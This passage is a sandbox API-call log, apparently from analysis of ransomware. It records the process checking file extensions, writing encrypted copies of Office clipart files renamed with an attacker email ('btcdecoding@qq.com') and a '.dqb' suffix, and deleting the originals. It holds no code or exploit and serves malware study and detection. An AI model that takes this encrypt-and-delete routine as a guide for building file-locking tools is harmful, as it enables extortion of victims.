Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0055.600] lstrlenW (lpString=".doc") returned 4 [0055.600] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.600] lstrlenW (lpString=".docx") returned 5 [0055.600] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.600] lstrlenW (lpString=".pdf") returned 4 [0055.600] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.600] lstrlenW (lpString=".xls") returned 4 [0055.600] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.600] lstrlenW (lpString=".xlsx") returned 5 [0055.600] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.600] lstrlenW (lpString=".ppt") returned 4 [0055.600] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0055.600] lstrlenW (lpString=".zip") returned 4 [0055.600] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.600] lstrlenW (lpString=".rar") returned 4 [0055.600] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.600] lstrlenW (lpString=".bz2") returned 4 [0055.600] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.600] lstrlenW (lpString=".7z") returned 3 [0055.600] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0055.600] lstrlenW (lpString=".dbf") returned 4 [0055.600] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0055.600] lstrlenW (lpString=".1cd") returned 4 [0055.600] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0055.600] lstrlenW (lpString=".jpg") returned 4 [0055.600] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.601] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.601] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.602] GetLastError () returned 0x0 [0055.602] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x5a4, lpOverlapped=0x0) returned 1 [0055.603] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0055.604] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.604] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.604] SetEndOfFile (hFile=0x214) returned 1 [0055.604] CloseHandle (hObject=0x214) returned 1 [0055.604] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.605] SetEndOfFile (hFile=0x240) returned 1 [0055.605] CloseHandle (hObject=0x240) returned 1 [0055.605] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.606] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf")) returned 1 [0055.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0055.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0055.606] lstrlenW (lpString=".doc") returned 4 [0055.606] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.606] lstrlenW (lpString=".docx") returned 5 [0055.606] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.606] lstrlenW (lpString=".pdf") returned 4 [0055.606] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.606] lstrlenW (lpString=".xls") returned 4 [0055.606] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.606] lstrlenW (lpString=".xlsx") returned 5 [0055.606] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.606] lstrlenW (lpString=".ppt") returned 4 [0055.606] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0055.606] lstrlenW (lpString=".zip") returned 4 [0055.606] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.606] lstrlenW (lpString=".rar") returned 4 [0055.606] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.606] lstrlenW (lpString=".bz2") returned 4 [0055.606] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.606] lstrlenW (lpString=".7z") returned 3 [0055.607] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0055.607] lstrlenW (lpString=".dbf") returned 4 [0055.607] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0055.607] lstrlenW (lpString=".1cd") returned 4 [0055.607] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0055.607] lstrlenW (lpString=".jpg") returned 4 [0055.607] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.607] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=7974) returned 1 [0055.607] CloseHandle (hObject=0x240) returned 1 [0055.607] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf")) returned 0x20 [0055.607] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0055.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0055.607] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.608] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.608] GetLastError () returned 0x0 [0055.608] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1f26, lpOverlapped=0x0) returned 1 [0055.692] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1f30, lpOverlapped=0x0) returned 1 [0055.711] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.711] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.711] SetEndOfFile (hFile=0x214) returned 1 [0055.711] CloseHandle (hObject=0x214) returned 1 [0055.712] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.712] SetEndOfFile (hFile=0x240) returned 1 [0055.712] CloseHandle (hObject=0x240) returned 1 [0055.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.713] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf")) returned 1 [0055.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0055.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0055.713] lstrlenW (lpString=".doc") returned 4 [0055.713] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.713] lstrlenW (lpString=".docx") returned 5 [0055.713] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.713] lstrlenW (lpString=".pdf") returned 4 [0055.713] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.713] lstrlenW (lpString=".xls") returned 4 [0055.713] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.713] lstrlenW (lpString=".xlsx") returned 5 [0055.713] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.713] lstrlenW (lpString=".ppt") returned 4 [0055.713] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0055.713] lstrlenW (lpString=".zip") returned 4 [0055.713] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.713] lstrlenW (lpString=".rar") returned 4 [0055.713] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.713] lstrlenW (lpString=".bz2") returned 4 [0055.713] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.713] lstrlenW (lpString=".7z") returned 3 [0055.713] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0055.713] lstrlenW (lpString=".dbf") returned 4 [0055.713] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0055.713] lstrlenW (lpString=".1cd") returned 4 [0055.714] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0055.714] lstrlenW (lpString=".jpg") returned 4 [0055.714] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.014] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.014] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0058.087] GetLastError () returned 0x0 [0058.087] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x804, lpOverlapped=0x0) returned 1 [0058.089] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x810, lpOverlapped=0x0) returned 1 [0058.090] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.090] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.090] SetEndOfFile (hFile=0x150) returned 1 [0058.090] CloseHandle (hObject=0x150) returned 1 [0058.090] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.090] SetEndOfFile (hFile=0x20c) returned 1 [0058.091] CloseHandle (hObject=0x20c) returned 1 [0058.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.091] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf")) returned 1 [0058.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0058.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0058.091] lstrlenW (lpString=".doc") returned 4 [0058.091] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.091] lstrlenW (lpString=".docx") returned 5 [0058.091] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.091] lstrlenW (lpString=".pdf") returned 4 [0058.091] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.091] lstrlenW (lpString=".xls") returned 4 [0058.092] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.092] lstrlenW (lpString=".xlsx") returned 5 [0058.092] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.092] lstrlenW (lpString=".ppt") returned 4 [0058.092] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0058.092] lstrlenW (lpString=".zip") returned 4 [0058.092] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.092] lstrlenW (lpString=".rar") returned 4 [0058.092] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.092] lstrlenW (lpString=".bz2") returned 4 [0058.092] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.092] lstrlenW (lpString=".7z") returned 3 [0058.092] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0058.092] lstrlenW (lpString=".dbf") returned 4 [0058.092] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0058.092] lstrlenW (lpString=".1cd") returned 4 [0058.092] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0058.092] lstrlenW (lpString=".jpg") returned 4 [0058.092] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.093] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.093] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0058.093] GetLastError () returned 0x0 [0058.093] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x976, lpOverlapped=0x0) returned 1 [0058.095] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x980, lpOverlapped=0x0) returned 1 [0058.096] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.096] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.096] SetEndOfFile (hFile=0x150) returned 1 [0058.096] CloseHandle (hObject=0x150) returned 1 [0058.096] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.096] SetEndOfFile (hFile=0x20c) returned 1 [0058.097] CloseHandle (hObject=0x20c) returned 1 [0058.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.097] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf")) returned 1 [0058.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0058.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0058.097] lstrlenW (lpString=".doc") returned 4 [0058.097] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.097] lstrlenW (lpString=".docx") returned 5 [0058.097] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0058.097] lstrlenW (lpString=".pdf") returned 4 [0058.097] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.097] lstrlenW (lpString=".xls") returned 4 [0058.097] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.098] lstrlenW (lpString=".xlsx") returned 5 [0058.098] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0058.098] lstrlenW (lpString=".ppt") returned 4 [0058.098] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0058.098] lstrlenW (lpString=".zip") returned 4 [0058.098] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.098] lstrlenW (lpString=".rar") returned 4 [0058.098] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.098] lstrlenW (lpString=".bz2") returned 4 [0058.098] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.098] lstrlenW (lpString=".7z") returned 3 [0058.098] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0058.098] lstrlenW (lpString=".dbf") returned 4 [0058.098] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0058.098] lstrlenW (lpString=".1cd") returned 4 [0058.098] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0058.098] lstrlenW (lpString=".jpg") returned 4 [0058.098] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.099] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.099] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0058.099] GetLastError () returned 0x0 [0058.099] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x8d6, lpOverlapped=0x0) returned 1 [0058.101] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x8e0, lpOverlapped=0x0) returned 1 [0058.102] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.102] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.102] SetEndOfFile (hFile=0x150) returned 1 [0058.102] CloseHandle (hObject=0x150) returned 1 [0058.102] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.102] SetEndOfFile (hFile=0x20c) returned 1 [0058.103] CloseHandle (hObject=0x20c) returned 1 [0058.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.103] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf")) returned 1 [0058.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0058.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0058.103] lstrlenW (lpString=".doc") returned 4 [0058.103] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.103] lstrlenW (lpString=".docx") returned 5 [0058.103] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0058.103] lstrlenW (lpString=".pdf") returned 4 [0058.103] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.103] lstrlenW (lpString=".xls") returned 4 [0058.103] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.103] lstrlenW (lpString=".xlsx") returned 5 [0058.104] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0058.104] lstrlenW (lpString=".ppt") returned 4 [0058.104] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0058.104] lstrlenW (lpString=".zip") returned 4 [0058.104] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.104] lstrlenW (lpString=".rar") returned 4 [0058.104] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.104] lstrlenW (lpString=".bz2") returned 4 